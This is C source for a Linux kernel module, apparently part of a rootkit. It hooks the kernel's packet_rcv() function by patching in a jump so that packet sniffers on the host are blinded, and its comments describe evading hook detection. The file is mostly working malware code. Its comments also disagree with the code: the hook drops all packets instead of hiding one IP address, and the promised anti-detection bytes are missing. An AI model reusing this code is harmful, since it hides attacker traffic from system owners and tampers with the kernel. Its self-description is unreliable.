 /* Written by bioforge  -  30th June, 2003
 */
#include <linux/config.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/netdevice.h>
#include <linux/skbuff.h>
#include <linux/ip.h>		       /* For struct ip */
#include <linux/if_ether.h>	       /* For ETH_P_IP */
#include <asm/page.h>		       /* For PAGE_OFFSET */

/* 
 * IP address to hide 127.0.0.1 in NBO for Intel */

#define IP    htonl(0x7F000001)

/* Function pointer for original packet_rcv() */
static int (*pr)(struct sk_buff *skb, struct net_device *dev,struct packet_type *pt, struct net_device *orig_dev);

/*
 * Deprecated desde el 2.6.1X
 * */
//MODULE_PARM(pr,"i");       /* Retrieved as insmod parameter */
module_param(pr, int, 0000);

/* Spinlock used for the parts where we un/hijack packet_rcv() */
static spinlock_t hijack_lock  = SPIN_LOCK_UNLOCKED;

/* Helper macros for use with the Hijack spinlock */
#define HIJACK_LOCK    spin_lock(&hijack_lock)
#define HIJACK_UNLOCK  spin_unlock(&hijack_lock)

#define CODESIZE 7
/* Original and hijack code buffers.
 * Note that the hijack code also provides 3 additional
 * bytes ( inc eax;  nop;  dec eax ) to try and throw
 * simple hijack detection techniques that just look for
 * a move and a jump. */
/* For packet_rcv() */
static unsigned char pr_code[CODESIZE] = "\xb8\x00\x00\x00\x00\xff\xe0";
static unsigned char pr_orig[CODESIZE];

/* Replacement for packet_rcv(). This is currently setup to hide
 * all packets with a source or destination IP address that we
 * specify. */
int hacked_pr(struct sk_buff *skb, struct net_device *dev,
	       struct packet_type *pt,struct net_device *orig_dev)
{
    return 0;
}

int init()
{
    int sl_flags;		       /* Flags for spinlock */
    /* pr & rr set as module parameters. If zero or < PAGE_OFFSET
     * (which we treat as the lower bound of kernel memory), then
     * we will not install the hacks. */
    if ((unsigned int)pr == 0 || (unsigned int)pr < PAGE_OFFSET) {
	printk("Address for packet_rcv() not valid! (%08x)\n", (int)pr);
	return -1;
    }
         
    printk("OK: packet_rcv() %0x \n", (int)pr);
    *(unsigned int *)(pr_code + 1) = (unsigned int)hacked_pr;
    
    //HIJACK_LOCK;
    memcpy(pr_orig, (char *)pr, CODESIZE);
    memcpy((char *)pr, pr_code, CODESIZE);
    //HIJACK_UNLOCK;
    
    return 0;
}

void cleanup()
{   // HIJACK_LOCK;
    memcpy((char *)pr, pr_orig, CODESIZE);
   // HIJACK_UNLOCK;
    
}
module_init(init);
module_exit(cleanup);
MODULE_LICENSE("GPL");
